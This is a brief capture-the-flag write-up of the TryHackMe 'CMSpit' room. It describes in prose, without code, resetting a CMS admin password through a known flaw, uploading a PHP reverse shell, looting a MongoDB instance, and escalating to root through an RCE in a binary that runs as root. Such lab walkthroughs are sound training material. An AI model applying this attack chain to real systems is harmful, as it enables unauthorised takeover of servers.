CMSpit
August 4, 2021•287 words
CMSpit - THM
After the initial scan, there are two open ports. Brute forcing the first would be unreasonable without having even tried looking at the other one, so let's start from the web server. On the login page, right up front, notice the shiny name of this CMS. With the power of this knowledge, start asking Google and sooner rather than later you should encounter this. Follow what it says like you never followed any other instruction and in no time you should be able to change the admin's password, meaning you can now log into the administrative console.
Keep on reading, the amazing article also tells you that file upload isn't guarded against malicious file, so you can just upload a PHP reverse shell and there you go, you have a shell on the target.
Following the room's instructions, check the open ports (netstat does wonders, nothing too fancy needed). The open port you couldn't see before, what is it? Google again, and it is a MongoDB instance running on the compromised server. Use mongocli to interact with it and you can retrieve both a flag and a password.
Using this password, escalate horizontally to the only real user on the machine. You can quickly notice there is a binary that can be run as root without needing any other permission. This binary suffers from an RCE vulnerability (a quite recent one), and a PoC is available here to more easily aid you in your payload creation. Either start a reverse shell, read shadow and crack passwords or just read root's flag, either way the machine is done and you can move on to your next target. Merry hacking!